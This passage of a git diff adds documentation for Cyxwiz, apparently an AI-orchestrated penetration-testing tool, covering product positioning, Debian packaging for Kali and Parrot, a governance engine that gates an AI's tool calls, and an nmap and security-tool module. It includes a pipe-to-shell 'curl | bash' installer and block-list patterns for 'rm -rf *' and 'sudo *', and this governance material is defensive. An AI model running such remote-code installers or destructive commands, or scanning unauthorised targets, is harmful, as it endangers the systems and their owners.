interactive assessments + +--- + +## What Makes Cyxwiz Unique + +### 1. Natural Language Orchestration +No other tool lets you say "scan this network for web vulnerabilities and check for SQL injection" and have it orchestrate nmap, nikto, and sqlmap automatically. + +### 2. Governance First +Built-in policy engine that evaluates every action before execution. Define what's allowed, what needs approval, and what's blocked. Essential for compliance. + +### 3. Scope Enforcement +Accidentally scanning a production server or out-of-scope IP can end careers and contracts. Cyxwiz enforces scope at the platform level. + +### 4. Tool Agnostic +Not locked into one ecosystem. Cyxwiz orchestrates whatever tools you have installed - the same tools you already know and trust. + +### 5. Audit Trail by Default +Every command, every approval, every result - automatically logged. Export for compliance without extra effort. + +### 6. AI-Powered Analysis +Not just execution, but explanation. Cyxwiz helps interpret results, suggest next steps, and identify what matters. + +--- + +## What Cyxwiz is NOT + +### NOT a Replacement for Expertise + +Cyxwiz is a force multiplier, not a replacement for security knowledge. It helps experts work faster, not turn novices into experts overnight. + +- You still need to understand what the tools do +- You still need to interpret findings correctly +- You still need to make judgment calls +- AI suggestions are starting points, not final answers + +### NOT an Exploitation Framework + +Cyxwiz focuses on assessment, not exploitation: + +- No payload generation +- No C2 infrastructure +- No persistence mechanisms +- No evasion techniques + +For exploitation, use Metasploit, Cobalt Strike, or dedicated tools. + +### NOT a Vulnerability Scanner + +Cyxwiz orchestrates scanners but isn't one itself: + +- No custom vulnerability signatures +- No authenticated scanning logic +- No compliance check libraries + +For dedicated scanning, use Nessus, Qualys, or OpenVAS. + +### NOT a SIEM/SOC Platform + +Cyxwiz is for offensive testing, not defensive monitoring: + +- No log ingestion +- No alert correlation +- No incident response workflows + +For SOC operations, use Splunk, Elastic, or similar. + +### NOT Trying to Replace All Tools + +Cyxwiz orchestrates tools, not replaces them: + +- nmap is still nmap +- nikto is still nikto +- You can always drop to raw CLI + +We complement your toolkit, not compete with it. + +### NOT for Malicious Use + +Cyxwiz includes governance specifically to prevent misuse: + +- Scope enforcement blocks unauthorized targets +- Audit logging creates accountability +- Designed for authorized testing only + +--- + +## Target Users + +### Ideal Users + +- **Penetration testers** who want to work faster with AI assistance +- **Security consultants** who need documented, compliant assessments +- **Red team members** (reconnaissance phase) who need orchestration +- **Security engineers** learning offensive techniques +- **Bug bounty hunters** working within defined scopes + +### Not Ideal For + +- Script kiddies looking for push-button hacking +- Malicious actors (governance will frustrate you) +- Those who need deep exploitation capabilities +- Users who prefer GUI-only interfaces + +--- + +## Integration Philosophy + +Cyxwiz is designed to integrate, not isolate: + +``` +┌─────────────────────────────────────────────────────────────┐ +│ Your Workflow │ +├─────────────────────────────────────────────────────────────┤ +│ │ +│ ┌─────────┐ ┌─────────┐ ┌─────────────┐ │ +│ │ Cyxwiz │────▶│ Tools │────▶│ Faraday/ │ │ +│ │ (AI │ │ (nmap, │ │ Jira/etc │ │ +│ │ Orch) │ │ nikto) │ │ (collab) │ │ +│ └─────────┘ └─────────┘ └─────────────┘ │ +│ │ │ │ +│ ▼ ▼ │ +│ ┌─────────────────────────────────────────────┐ │ +│ │ Reports / Audit Logs │ │ +│ └─────────────────────────────────────────────┘ │ +│ │ +└─────────────────────────────────────────────────────────────┘ +``` + +- Use Cyxwiz for orchestration and execution +- Export findings to Faraday/Dradis for collaboration +- Generate reports for clients +- Integrate with ticketing systems + +--- + +## Summary + +| If you need... | Use... | +|----------------|--------| +| AI-orchestrated pentesting | **Cyxwiz** | +| Deep exploitation | Metasploit | +| Team collaboration | Faraday | +| Red team operations | Cobalt Strike | +| Learning/advice | PentestGPT | +| Vulnerability scanning | Nessus/OpenVAS | +| Custom automation | Ansible/Python | +| Quick one-off commands | Direct CLI | + +**Cyxwiz fills the gap between "I know what I want to do" and "now I have to remember 50 different tool syntaxes and manually track everything."** diff --git a/docs/DISTRIBUTION.md b/docs/DISTRIBUTION.md new file mode 100644 index 00000000000..6669c2630b5 --- /dev/null +++ b/docs/DISTRIBUTION.md @@ -0,0 +1,299 @@ +# Distribution Channels: Kali Linux & Parrot OS + +This document outlines the strategy for distributing Cyxwiz through the official Kali Linux and Parrot OS repositories. + +--- + +## Overview + +Both Kali Linux and Parrot OS use Debian-based packaging (.deb). To get Cyxwiz included in their official repositories, we need to: + +1. Create a proper Debian package +2. Meet their tool criteria +3. Submit through their official channels + +--- + +## Kali Linux Distribution + +### Official Documentation +- [Submitting Tools to Kali](https://www.kali.org/docs/tools/submitting-tools/) +- [Intro to Packaging](https://www.kali.org/docs/development/intro-to-packaging-example/) +- [Bug Tracker](https://bugs.kali.org/) + +### Requirements Checklist + +| Requirement | Status | Notes | +|-------------|--------|-------| +| `debian/` directory | DONE | Complete packaging created | +| Tagged release | DONE | v1.1.0 released | +| Clear license | DONE | MIT License | +| Homepage | DONE | GitHub repo | +| Documentation | DONE | README, docs/ | +| Dependencies listed | DONE | In debian/control | +| Installation instructions | DONE | In README | +| Usage examples | DONE | In README | +| Active development | DONE | Regular commits | +| Not duplicate of existing tool | DONE | Unique AI orchestration approach | +| Man page | DONE | debian/cyxwiz.1 | + +### Submission Information + +When submitting to Kali's bug tracker, we need: + +``` +Category: New Tool Requests +Severity: Minor +Priority: Normal + +Name: cyxwiz +Version: 1.0.0 (use tagged release) +Homepage: https://github.com/code3hr/opencode +Author: code3hr +License: MIT + +Description: +AI-powered security operations platform. Orchestrates 30+ security tools +through natural language. Features governance engine, scope enforcement, +audit logging, and structured findings management. + +Dependencies: +- bun (JavaScript runtime) +- nmap, nikto, nuclei, etc. (security tools - already in Kali) + +Similar Tools: +- None directly comparable (unique AI orchestration approach) +- Partially overlaps with: metasploit (automation), faraday (findings) + +Installation: +bun install && bun run build + +Usage: +$ cyxwiz +> scan 192.168.1.0/24 for vulnerabilities +``` + +### Kali Metapackage Target + +Cyxwiz should be included in: +- `kali-tools-top10` - Core tools +- `kali-tools-automation` - Automation category + +--- + +## Parrot OS Distribution + +### Official Documentation +- [Community Contributions](https://parrotsec.org/docs/introduction/community-contributions/) +- [GitLab Repository](https://gitlab.com/parrotsec) +- Contact: team@parrotsec.org + +### Requirements Checklist + +| Requirement | Status | Notes | +|-------------|--------|-------| +| GitLab account | TODO | Create account | +| Debian packaging | DONE | debian/ directory created | +| Debian standards compliance | DONE | Follows Debian policy | +| Email submission | DONE | Sent to team@parrotsec.org | +| Fork on personal repo | PENDING | Awaiting team response | +| Merge request | PENDING | Awaiting team response | + +### Submission Process + +1. **Email team@parrotsec.org** with: + - Project name: Cyxwiz + - Description: AI-powered security operations platform + - Sub-project: Security tools + - Contribution type: New tool package + +2. **Create GitLab fork** and prepare Debian package + +3. **Submit merge request** for review + +--- + +## Debian Packaging Requirements + +Both distributions require proper Debian packaging. Here's what we need: + +### Directory Structure (Implemented) + +``` +cyxwiz/ +├── debian/ +│ ├── changelog # Version history (1.0.0-1) +│ ├── compat # Debhelper compatibility (13) +│ ├── control # Package metadata +│ ├── copyright # MIT license information +│ ├── rules # Build instructions +│ ├── install # File installation paths +│ ├── postinst # Post-install script (Bun setup) +│ ├── prerm # Pre-removal script +│ ├── postrm # Post-removal script +│ ├── cyxwiz.1 # Man page +│ └── source/ +│ └── format # Source format (3.0 native) +├── packages/ +└── ... +``` + +### debian/control + +``` +Source: cyxwiz +Section: utils +Priority: optional +Maintainer: code3hr +Build-Depends: debhelper (>= 11) +Standards-Version: 4.5.0 +Homepage: https://github.com/code3hr/opencode + +Package: cyxwiz +Architecture: all +Depends: ${misc:Depends}, bun +Recommends: nmap, nikto, nuclei, gobuster, ffuf, sqlmap, + smbclient, ldap-utils, snmp, dnsutils +Description: AI-powered security operations platform + Cyxwiz is an AI-powered operations platform for security professionals. + It orchestrates 30+ security tools through natural language commands, + with governance, scope enforcement, and audit logging. + . + Features: + - Natural language tool orchestration + - Governance engine with policy-based approval + - Scope enforcement for authorized targets + - Comprehensive audit logging + - Structured findings management + - Professional report generation +``` + +### debian/rules + +```makefile +#!/usr/bin/make -f + +%: + dh $@ + +override_dh_auto_build: + bun install + bun run build + +override_dh_auto_install: + mkdir -p debian/cyxwiz/usr/lib/cyxwiz + cp -r dist/* debian/cyxwiz/usr/lib/cyxwiz/ + mkdir -p debian/cyxwiz/usr/bin + ln -s /usr/lib/cyxwiz/cyxwiz debian/cyxwiz/usr/bin/cyxwiz +``` + +--- + +## Action Items + +### Phase 1: Prepare Package (Priority: High) + +- [x] Create `debian/` directory with all required files +- [x] Write man page for cyxwiz +- [x] Create tagged release (v1.1.0) +- [x] Test package build locally +- [ ] Test installation on clean Kali VM +- [ ] Test installation on clean Parrot VM + +### Phase 2: Submit to Kali (Priority: High) + +- [x] Create account on bugs.kali.org +- [x] Submit new tool request (January 2026) +- [ ] Respond to reviewer feedback +- [ ] Iterate on packaging if needed + +### Phase 3: Submit to Parrot (Priority: High) + +- [ ] Create GitLab account +- [x] Email team@parrotsec.org (January 2026) +- [ ] Fork and prepare package +- [ ] Submit merge request +- [ ] Respond to reviewer feedback + +### Phase 4: Ongoing Maintenance + +- [ ] Monitor for security updates +- [ ] Update packages with new releases +- [ ] Respond to user issues +- [ ] Engage with community + +--- + +## Alternative Distribution Methods + +While working on official inclusion, we can also distribute via: + +### 1. Direct .deb Download + +Host .deb packages on GitHub releases for manual installation: + +```bash +wget https://github.com/code3hr/opencode/releases/download/v1.1.0/cyxwiz_1.1.0-1_all.deb +sudo dpkg -i cyxwiz_1.1.0-1_all.deb +sudo apt-get install -f # Install dependencies +``` + +### 2. APT Repository + +Host our own APT repository: + +```bash +# Add repository +echo "deb https://apt.cyxwiz.dev stable main" | sudo tee /etc/apt/sources.list.d/cyxwiz.list +wget -qO - https://apt.cyxwiz.dev/key.gpg | sudo apt-key add - + +# Install +sudo apt update +sudo apt install cyxwiz +``` + +### 3. Installation Script + +One-liner installation (current method): + +```bash +curl -fsSL https://cyxwiz.dev/install.sh | bash +``` + +### 4. Homebrew (for macOS users) + +```bash +brew tap code3hr/cyxwiz +brew install cyxwiz +``` + +--- + +## Timeline Estimate + +| Phase | Status | +|-------|--------| +| Debian packaging | COMPLETE | +| Kali submission | SUBMITTED (Jan 2026) | +| Kali review process | PENDING (2-4 weeks) | +| Parrot submission | SUBMITTED (Jan 2026) | +| Parrot review | PENDING (2-4 weeks) | +| Official inclusion | 1-3 months total | + +--- + +## Resources + +- [Debian Policy Manual](https://www.debian.org/doc/debian-policy/) +- [Debian New Maintainers' Guide](https://www.debian.org/doc/manuals/maint-guide/) +- [Kali Public Packaging](https://www.kali.org/docs/development/public-packaging/) +- [Lintian - Debian Package Checker](https://lintian.debian.org/) + +--- + +## Sources + +- [Kali Linux - Submitting Tools](https://www.kali.org/docs/tools/submitting-tools/) +- [Parrot OS - Community Contributions](https://parrotsec.org/docs/introduction/community-contributions/) +- [Kali Linux Bug Tracker](https://bugs.kali.org/) +- [Parrot GitLab](https://gitlab.com/parrotsec) diff --git a/docs/GOVERNANCE.md b/docs/GOVERNANCE.md new file mode 100644 index 00000000000..a0eea9f79e6 --- /dev/null +++ b/docs/GOVERNANCE.md @@ -0,0 +1,670 @@ +# Governance Engine Documentation + +The Governance Engine provides centralized control over AI tool executions in cyxwiz. It enforces scope restrictions, evaluates policy-based rules, and maintains comprehensive audit logs for all tool operations. + +--- + +## Table of Contents + +- [Overview](#overview) +- [Quick Start](#quick-start) +- [Architecture](#architecture) +- [Configuration Reference](#configuration-reference) +- [Module Reference](#module-reference) +- [Usage Examples](#usage-examples) +- [Integration Guide](#integration-guide) +- [Troubleshooting](#troubleshooting) + +--- + +## Overview + +### What is the Governance Engine? + +The Governance Engine is a security layer that intercepts all tool executions before they run. It provides: + +- **Scope Enforcement**: Restrict which IPs and domains tools can access +- **Policy Rules**: Define what actions to take for specific tools/commands +- **Audit Logging**: Complete audit trail of all tool executions +- **Real-time Events**: Bus events for monitoring and alerting + +### When to Use Governance + +Enable governance when you need to: + +- Restrict AI access to internal networks only +- Block access to production systems +- Auto-approve safe, read-only operations +- Maintain compliance audit trails +- Monitor tool usage patterns + +--- + +## Quick Start + +### 1. Enable Governance + +Add to your `opencode.jsonc` or project config: + +```jsonc +{ + "governance": { + "enabled": true, + "default_action": "require-approval" + } +} +``` + +### 2. Add Scope Restrictions + +Limit which networks the AI can access: + +```jsonc +{ + "governance": { + "enabled": true, + "scope": { + "ip": { + "allow": ["10.0.0.0/8", "192.168.0.0/16"] + }, + "domain": { + "allow": ["*.company.com", "github.com"], + "deny": ["*.prod.company.com"] + } + } + } +} +``` + +### 3. Add Policy Rules + +Define actions for specific tools: + +```jsonc +{ + "governance": { + "enabled": true, + "policies": [ + { + "description": "Auto-approve read-only tools", + "action": "auto-approve", + "tools": ["read", "glob", "grep"] + }, + { + "description": "Block dangerous commands", + "action": "blocked", + "tools": ["bash"], + "commands": ["rm -rf *", "sudo *"] + } + ], + "default_action": "require-approval" + } +} +``` + +--- + +## Architecture + +### Execution Flow + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ Tool Execution Request │ +│ (bash, read, webfetch, etc.) │ +└─────────────────────────────────────────────────────────────────┘ + │ + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ 1. Target Extraction │ +│ Analyze tool arguments for IPs, domains, URLs │ +└─────────────────────────────────────────────────────────────────┘ + │ + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ 2. Scope Check │ +│ Verify targets against allow/deny lists │ +│ │ +│ ┌─────────────┐ ┌─────────────┐ │ +│ │ IP/CIDR │ │ Domain │ │ +│ │ Matching │ │ Wildcards │ │ +│ └─────────────┘ └─────────────┘ │ +└─────────────────────────────────────────────────────────────────┘ + │ + ┌───────────┴───────────┐ + │ │ + Scope Passed Scope Failed + │ │ + ▼ ▼ +┌───────────────────────────┐ ┌───────────────────────┐ +│ 3. Policy Evaluation │ │ DENIED │ +│ Match against rules │ │ (Scope Violation) │ +│ First match wins │ └───────────────────────┘ +└───────────────────────────┘ + │ + ┌───────────┼───────────┐ + │ │ │ + ▼ ▼ ▼ +┌───────────┐ ┌───────────┐ ┌───────────┐ +│ auto- │ │ require- │ │ blocked │ +│ approve │ │ approval │ │ │ +└───────────┘ └───────────┘ └───────────┘ + │ │ │ + ▼ ▼ ▼ + Execute Ask User DENIED + Directly Permission (Policy) + │ + ▼ +┌─────────────────────────────────────────────────────────────────┐ +│ 4. Audit Logging │ +│ Record outcome, publish bus events │ +└─────────────────────────────────────────────────────────────────┘ +``` + +### Module Structure + +``` +src/governance/ +├── index.ts # Main entry point, orchestration +├── types.ts # Zod schemas, TypeScript types +├── matcher.ts # Target extraction and pattern matching +├── scope.ts # IP/domain scope enforcement +├── policy.ts # Policy rule evaluation +└── audit.ts # Audit logging and events +``` + +--- + +## Configuration Reference + +### Full Schema + +```typescript +interface GovernanceConfig { + // Master switch - governance is disabled by default + enabled?: boolean // default: false + + // Network scope restrictions + scope?: { + ip?: { + allow?: string[] // CIDR patterns: ["10.0.0.0/8"] + deny?: string[] // Deny takes precedence + } + domain?: { + allow?: string[] // Wildcards: ["*.company.com"] + deny?: string[] // Deny takes precedence + } + } + + // Policy rules (evaluated in order, first match wins) + policies?: Array<{ + action: "auto-approve" | "require-approval" | "blocked" + tools?: string[] // Tool name patterns + commands?: string[] // Bash command patterns + targets?: string[] // Network target patterns + description?: string // For logs and auditing + }> + + // Action when no policy matches + default_action?: "auto-approve" | "require-approval" | "blocked" + // default: "require-approval" + + // Audit logging configuration + audit?: { + enabled?: boolean // default: true + storage?: "file" | "memory" // default: "file" + retention?: number // Days to keep logs + include_args?: boolean // Log tool arguments (privacy) + } +} +``` + +### Configuration Options + +#### `enabled` +- **Type**: `boolean` +- **Default**: `false` +- **Description**: Master switch for governance. Must be explicitly set to `true`. + +#### `scope.ip.allow` / `scope.ip.deny` +- **Type**: `string[]` +- **Format**: CIDR notation (`10.0.0.0/8`, `192.168.1.0/24`) +- **Description**: IP address restrictions. Deny rules are checked first. + +#### `scope.domain.allow` / `scope.domain.deny` +- **Type**: `string[]` +- **Format**: Wildcard patterns (`*.example.com`, `api.github.com`) +- **Description**: Domain restrictions. Deny rules are checked first. + +#### `policies[].action` +- **Type**: `"auto-approve" | "require-approval" | "blocked"` +- **Description**: + - `auto-approve`: Execute without user confirmation + - `require-approval`: Ask user for permission (existing behavior) + - `blocked`: Deny execution entirely + +#### `policies[].tools` +- **Type**: `string[]` +- **Format**: Wildcard patterns (`bash`, `read`, `mcp_*`) +- **Description**: Match tool names + +#### `policies[].commands` +- **Type**: `string[]` +- **Format**: Wildcard patterns (`ssh *`, `curl *`, `rm -rf *`) +- **Description**: Match bash command strings (only applies when tool is `bash`) + +#### `policies[].targets` +- **Type**: `string[]` +- **Format**: CIDR or wildcard patterns +- **Description**: Match extracted network targets + +#### `default_action` +- **Type**: `"auto-approve" | "require-approval" | "blocked"` +- **Default**: `"require-approval"` +- **Description**: Action when no policy matches + +#### `audit.storage` +- **Type**: `"file" | "memory"` +- **Default**: `"file"` +- **Description**: Where to store audit entries + +#### `audit.include_args` +- **Type**: `boolean` +- **Default**: `false` +- **Description**: Include tool arguments in audit logs (may contain sensitive data) + +--- + +## Module Reference + +### Types (`types.ts`) + +Core type definitions using Zod schemas. + +| Type | Description | +|------|-------------| +| `Outcome` | `"allowed"` \| `"denied"` \| `"pending-approval"` \| `"error"` | +| `TargetType` | `"ip"` \| `"cidr"` \| `"domain"` \| `"url"` \| `"unknown"` | +| `Target` | `{ raw: string, type: TargetType, normalized: string }` | +| `AuditEntry` | Complete audit record with id, timestamp, tool, outcome, etc. | +| `CheckRequest` | Input to `Governance.check()` | +| `CheckResult` | Output from `Governance.check()` | + +**Bus Events:** +- `governance.checked` - Published after every governance check +- `governance.policy_violation` - Published when a tool is denied + +### Matcher (`matcher.ts`) + +Target extraction and pattern matching utilities. + +| Function | Description | +|----------|-------------| +| `classifyTarget(raw)` | Classify string as IP, CIDR, domain, URL, or unknown | +| `extractTargets(tool, args)` | Extract network targets from tool arguments | +| `ipInCidr(ip, cidr)` | Check if IP falls within CIDR range | +| `matchTarget(target, pattern)` | Match target against pattern | + +**Tool-specific extraction:** +- `bash`: Analyzes command for URLs, IPs, SSH patterns (`user@host`), and common tools (curl, wget, ssh, etc.) +- `webfetch`: Extracts the `url` argument directly +- `websearch`: No network targets (search queries) +- Other tools: Scans all string argument values + +### Scope (`scope.ts`) + +Network scope enforcement. + +| Function | Description | +|----------|-------------| +| `check(targets, scope)` | Validate all targets against scope configuration | + +**Evaluation order:** +1. Check deny list first - if matches, immediately deny +2. Check allow list - if exists and doesn't match, deny +3. Default to allow + +### Policy (`policy.ts`) + +Policy rule evaluation. + +| Function | Description | +|----------|-------------| +| `evaluate(tool, args, targets, policies, defaultAction)` | Evaluate policies, return action | +| `describe(policy)` | Get human-readable policy description | + +**Matching rules (AND logic):** +- `tools`: Tool name must match at least one pattern +- `commands`: Bash command must match at least one pattern +- `targets`: At least one target must match at least one pattern + +**First match wins** - policy order matters! + +### Audit (`audit.ts`) + +Audit logging and querying. + +| Function | Description | +|----------|-------------| +| `record(entry, config)` | Record an audit entry | +| `list(config, options)` | Query audit entries with filters | +| `get(id)` | Get single audit entry by ID | +| `clearMemory()` | Clear in-memory buffer (testing) | +| `memoryCount()` | Get count of entries in memory | + +### Main (`index.ts`) + +Main entry point and orchestration. + +| Export | Description | +|--------|-------------| +| `Governance.check(request, config)` | Main governance check function | +| `Governance.isEnabled(config)` | Check if governance is enabled | +| `Governance.DeniedError` | Error thrown when tool is blocked | +| `Governance.Types` | Re-export of types namespace | +| `Governance.Scope` | Re-export of scope namespace | +| `Governance.Policy` | Re-export of policy namespace | +| `Governance.Audit` | Re-export of audit namespace | +| `Governance.Matcher` | Re-export of matcher namespace | + +--- + +## Usage Examples + +### Basic Governance Check + +```typescript +import { Governance } from "./governance" +import { Config } from "./config/config" + +const config = await Config.get() + +const result = await Governance.check( + { + sessionID: "session_abc", + callID: "call_123", + tool: "bash", + args: { command: "curl https://api.example.com/data" } + }, + config.governance +) + +if (!result.allowed) { + console.log(`Blocked: ${result.reason}`) + console.log(`Policy: ${result.matchedPolicy}`) +} +``` + +### Subscribe to Governance Events + +```typescript +import { Bus } from "./bus" +import { Governance } from "./governance" + +// Monitor all governance checks +Bus.subscribe(Governance.Types.Event.Checked, ({ entry }) => { + console.log(`[${entry.outcome}] ${entry.tool}`) + if (entry.targets.length > 0) { + console.log(` Targets: ${entry.targets.map(t => t.normalized).join(", ")}`) + } +}) + +// Alert on policy violations +Bus.subscribe(Governance.Types.Event.PolicyViolation, ({ entry, policy }) => { + sendAlert({ + title: "Governance Policy Violation", + tool: entry.tool, + policy: policy, + reason: entry.reason, + timestamp: entry.timestamp + }) +}) +``` + +### Query Audit Logs + +```typescript +import { Governance } from "./governance" + +// Get recent denied entries +const denied = await Governance.Audit.list(config.audit, { + limit: 50, + outcome: "denied" +}) + +for (const entry of denied) { + console.log(`${new Date(entry.timestamp).toISOString()} - ${entry.tool}`) + console.log(` Reason: ${entry.reason}`) + console.log(` Policy: ${entry.policy || "scope violation"}`) +} + +// Get all entries for a specific session +const sessionLogs = await Governance.Audit.list(config.audit, { + sessionID: "session_abc" +}) +``` + +### Custom Target Classification + +```typescript +import { Governance } from "./governance" + +// Classify a string +const target = Governance.Matcher.classifyTarget("192.168.1.100") +console.log(target) +// { raw: "192.168.1.100", type: "ip", normalized: "192.168.1.100" } + +// Check CIDR membership +const inRange = Governance.Matcher.ipInCidr("192.168.1.100", "192.168.0.0/16") +console.log(inRange) // true + +// Extract targets from bash command +const targets = Governance.Matcher.extractTargets("bash", { + command: "ssh admin@server.prod.company.com && curl https://api.example.com" +}) +// [ +// { raw: "server.prod.company.com", type: "domain", normalized: "server.prod.company.com" }, +// { raw: "https://api.example.com", type: "url", normalized: "api.example.com" } +// ] +``` + +--- + +## Integration Guide + +### How Governance Integrates with cyxwiz + +The governance engine hooks into the plugin system: + +``` +User Request → AI generates tool call → Plugin.trigger("tool.execute.before") + ↓ + Governance.check() + ↓ + ┌───────────┴───────────┐ + ↓ ↓ + Allowed Denied + ↓ ↓ + Execute tool Return error message + ↓ ↓ + Plugin.trigger("tool.execute.after") + ↓ + Return result to AI +``` + +### Files Modified for Integration + +| File | Integration Point | +|------|-------------------| +| `src/plugin/index.ts` | Governance check in `trigger()` function | +| `src/session/prompt.ts` | `GovernanceDeniedError` handling | +| `src/config/config.ts` | Governance schema in config | + +### Plugin Integration (`plugin/index.ts`) + +```typescript +export async function trigger(name, input, output) { + // Governance check before tool execution + if (name === "tool.execute.before") { + const config = await Config.get() + if (Governance.isEnabled(config.governance)) { + const result = await Governance.check( + { + tool: input.tool, + args: input.args, + sessionID: input.sessionID, + callID: input.callID, + }, + config.governance + ) + + if (!result.allowed) { + throw new Governance.DeniedError(result) + } + } + } + + // Continue with plugin hooks... +} +``` + +### Error Handling (`session/prompt.ts`) + +```typescript +async execute(args, options) { + try { + await Plugin.trigger("tool.execute.before", { tool, args, ... }) + } catch (err) { + if (err instanceof Governance.DeniedError) { + return { + output: `[GOVERNANCE DENIED] Tool "${tool}" was blocked. +Reason: ${err.result.reason} +Policy: ${err.result.matchedPolicy || "scope violation"}`, + metadata: { governance: { denied: true, ...err.result } } + } + } + throw err + } + + // Execute the tool... +} +``` + +--- + +## Troubleshooting + +### Common Issues + +#### "Governance disabled" in logs +**Cause**: Governance is not enabled in config. +**Solution**: Set `"enabled": true` in your governance config. + +#### Tools blocked unexpectedly +**Cause**: Scope or policy rules are too restrictive. +**Solution**: +1. Check audit logs: `Governance.Audit.list(config.audit, { outcome: "denied" })` +2. Review the `reason` field to understand why +3. Adjust scope or policies accordingly + +#### Policies not matching as expected +**Cause**: Policy order matters - first match wins. +**Solution**: Place more specific policies before general ones. + +```jsonc +// WRONG - general policy matches first +{ + "policies": [ + { "action": "require-approval", "tools": ["bash"] }, + { "action": "blocked", "tools": ["bash"], "commands": ["rm -rf *"] } + ] +} + +// CORRECT - specific policy first +{ + "policies": [ + { "action": "blocked", "tools": ["bash"], "commands": ["rm -rf *"] }, + { "action": "require-approval", "tools": ["bash"] } + ] +} +``` + +#### Targets not being extracted from bash commands +**Cause**: The command pattern isn't recognized. +**Solution**: The matcher looks for: +- URLs (`http://`, `https://`) +- IP addresses (`192.168.1.1`) +- CIDR notation (`10.0.0.0/8`) +- SSH patterns (`user@host`) +- Common tool invocations (`curl`, `wget`, `ssh`, etc.) + +If your command uses a different pattern, the target may not be extracted. + +### Debug Logging + +Enable debug logging to see governance decisions: + +```typescript +// In your config or environment +LOG_LEVEL=debug +``` + +This will show: +- Target extraction results +- Scope check details +- Policy matching process +- Audit entry creation + +### Testing Governance + +```typescript +// Test scope checking +const targets = [ + { raw: "10.0.0.5", type: "ip", normalized: "10.0.0.5" } +] +const scopeResult = Governance.Scope.check(targets, { + ip: { allow: ["10.0.0.0/8"] } +}) +console.log(scopeResult) // { allowed: true } + +// Test policy evaluation +const policyResult = Governance.Policy.evaluate( + "bash", + { command: "ls -la" }, + [], + [{ action: "auto-approve", tools: ["bash"], commands: ["ls *"] }], + "require-approval" +) +console.log(policyResult) // { action: "auto-approve", matchedPolicy: "Policy #1", ... } +``` + +--- + +## Appendix + +### Pattern Matching Reference + +| Pattern | Matches | Does Not Match | +|---------|---------|----------------| +| `*.example.com` | `api.example.com`, `www.example.com` | `example.com` | +| `example.com` | `example.com` | `api.example.com` | +| `10.0.0.0/8` | `10.1.2.3`, `10.255.255.255` | `11.0.0.0` | +| `192.168.1.0/24` | `192.168.1.1`, `192.168.1.255` | `192.168.2.1` | +| `ssh *` | `ssh user@host`, `ssh -p 22 host` | `sshd`, `openssh` | +| `curl *` | `curl https://api.com`, `curl -X POST` | `curling` | + +### Outcome Reference + +| Outcome | Description | Tool Executes? | +|---------|-------------|----------------| +| `allowed` | Auto-approved by policy | Yes | +| `pending-approval` | Requires user permission | If user approves | +| `denied` | Blocked by scope or policy | No | +| `error` | Error during governance check | No | + +### Event Reference + +| Event | When Published | Payload | +|-------|----------------|---------| +| `governance.checked` | After every check | `{ entry: AuditEntry }` | +| `governance.policy_violation` | When denied | `{ entry: AuditEntry, policy: string }` | diff --git a/docs/PENTEST.md b/docs/PENTEST.md new file mode 100644 index 00000000000..7693161d2ac --- /dev/null +++ b/docs/PENTEST.md @@ -0,0 +1,414 @@ +# Pentest Module Documentation + +This document describes the penetration testing module for cyxwiz, which provides security scanning, vulnerability assessment, and findings management capabilities. + +--- + +## Table of Contents + +- [Overview](#overview) +- [Architecture](#architecture) +- [Components](#components) +- [Tools](#tools) +- [Configuration](#configuration) +- [Usage](#usage) +- [Integration with Governance](#integration-with-governance) + +--- + +## Overview + +The pentest module provides penetration testing capabilities similar to what you would find on Kali Linux or Parrot OS. It integrates with the cyxwiz governance system to enforce scope restrictions and provides structured output with findings management. + +### Key Features + +- **Nmap Integration**: Full nmap support with XML output parsing +- **Security Tools Wrapper**: Access to 30+ common security tools +- **Findings Management**: Store, query, and track security findings +- **Governance Integration**: Scope enforcement for authorized targets +- **LLM Analysis**: AI-powered explanation of scan results + +--- + +## Architecture + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ Pentest Module │ +│ │ +│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │ +│ │ Nmap Tool │ │ SecTools │ │ Findings │ │ +│ │ (scanning) │ │ (wrapper) │ │ (storage) │ │ +│ └──────┬──────┘ └──────┬──────┘ └──────┬──────┘ │ +│ │ │ │ │ +│ ▼ ▼ ▼ │ +│ ┌─────────────────────────────────────────────────┐ │ +│ │ NmapParser (XML parsing) │ │ +│ └─────────────────────────────────────────────────┘ │ +│ │ │ +│ ▼ │ +│ ┌─────────────────────────────────────────────────┐ │ +│ │ Governance (scope enforcement) │ │ +│ └─────────────────────────────────────────────────┘ │ +└─────────────────────────────────────────────────────────────────┘ +``` + +--- + +## Components + +### 1. Types (`types.ts`) + +Defines core types using Zod schemas: + +| Type | Description | +|------|-------------| +| `Severity` | Finding severity levels (critical, high, medium, low, info) | +| `FindingStatus` | Finding lifecycle status (open, confirmed, mitigated, false_positive) | +| `ScanType` | Types of scans (port, service, vuln, web, custom) | +| `PortState` | Port states from nmap (open, closed, filtered, etc.) | +| `Port` | Individual port scan result | +| `Host` | Host information with ports and OS detection | +| `ScanResult` | Complete scan result with all hosts | +| `Finding` | Security finding with severity and remediation | + +### 2. Nmap Parser (`nmap-parser.ts`) + +Parses nmap XML output into structured data: + +| Function | Purpose | +|----------|---------| +| `parse()` | Parse nmap XML into ScanResult | +| `formatResult()` | Format scan result as human-readable text | +| `summarize()` | Generate concise scan summary | + +### 3. Findings (`findings.ts`) + +Manages storage and retrieval of security findings: + +| Function | Purpose | +|----------|---------| +| `create()` | Create a new finding | +| `update()` | Update existing finding | +| `get()` | Retrieve finding by ID | +| `list()` | List findings with filters | +| `remove()` | Delete a finding | +| `saveScan()` | Save scan result | +| `getScan()` | Retrieve scan result | +| `listScans()` | List scan results | +| `analyzeAndCreateFindings()` | Auto-generate findings from scan | + +### 4. Nmap Tool (`nmap-tool.ts`) + +Dedicated nmap tool with full feature support: + +| Parameter | Description | +|-----------|-------------| +| `target` | IP, hostname, or CIDR range | +| `ports` | Port specification (e.g., "22,80,443") | +| `serviceDetection` | Enable -sV service detection | +| `timing` | Timing template (0-5) | +| `udpScan` | Include UDP scanning | +| `osDetection` | Enable OS detection | +| `scriptScan` | Run default NSE scripts | +| `analyzeFindings` | Auto-create findings | + +### 5. Security Tools (`sectools.ts`) + +Wrapper for 30+ common security tools: + +**Network Reconnaissance:** +- nmap, masscan, netcat (nc) + +**Web Scanning:** +- nikto, dirb, gobuster, ffuf, wpscan, whatweb, wafw00f + +**Vulnerability Scanning:** +- nuclei, searchsploit + +**SQL Injection:** +- sqlmap + +**SMB/Windows:** +- enum4linux, smbclient, crackmapexec, rpcclient + 